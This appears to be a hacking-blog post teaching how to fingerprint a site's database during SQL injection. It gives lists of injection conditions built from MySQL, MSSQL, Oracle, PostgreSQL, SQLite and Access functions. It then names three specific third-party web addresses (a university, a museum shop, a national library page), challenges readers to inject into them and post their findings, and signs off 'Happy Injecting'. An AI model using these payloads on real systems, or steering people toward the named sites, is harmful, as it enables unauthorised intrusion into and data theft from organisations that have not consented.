Manual Inj3ct0rs Guide to recognize database

Post Image
In the Name of ALLAH the Most Beneficent and the Merciful

Many times its not so easy to recognize the Database we are facing, In this guide we will discuss some simple tricks to recognize and confirm which database are we facing at that time.

I wont tell you different types of error because in many of the scenario we dont have errors as well as there are thousands of generic error which can not always specific that we can use them to recognize the database of the application. So we ll use a very simple trick which is also used by many SQLi tools to detect the database type behind the mask.

For that we are going to use the functions related to that database into our injection if the output is normal then its working but if we get any error or the page output dont come as normal then we can understand that the function we are using do belongs to this db.

To check if the current db is MySQL:

conv('a',16,2)=conv('a',16,2)
connection_id()=connection_id()
crc32('MySQL')=crc32('MySQL')

To check if the current db is MSSQL:

BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)
@@CONNECTIONS>0
@@CONNECTIONS=@@CONNECTIONS
@@CPU_BUSY=@@CPU_BUSY
USER_ID(1)=USER_ID(1)

To check if the current db is Oracle:

ROWNUM=ROWNUM
RAWTOHEX('AB')=RAWTOHEX('AB')
LNNVL(0=123)

To check if the current db is PostgreSQL:

5::int=5
5::integer=5
pg_client_encoding()=pg_client_encoding()
get_current_ts_config()=get_current_ts_config()
quote_literal(42.5)=quote_literal(42.5)
current_database()=current_database()

To check if the current db is SQLite:

sqlite_version()=sqlite_version()
last_insert_rowid()>1
last_insert_rowid()=last_insert_rowid()

To check if the current db is MSACCESS:

val(cvar(1))=1
IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0
cdbl(1)=cdbl(1)

Now as we are completed with the functions lets see how you can use them.


Now try and recognize the following DBs and Post the solution in comments if you are able to recognize.

http://www.bput.ac.in/notices.asp?id=1
http://www.shipwreckmuseum.com/shop.php?PAGE=DISPLAY&cat_id=13
http://www.nb.no/pm/samling.php?title_id=1

Thanks For reading, Happy Injecting.
Newer post

Hand Guide To Local File Inclusion(LFI)

Hand Guide To Local File Inclusion(LFI)
MSSQL DIOS (Dump in One Shot)
Older post

MSSQL DIOS (Dump in One Shot)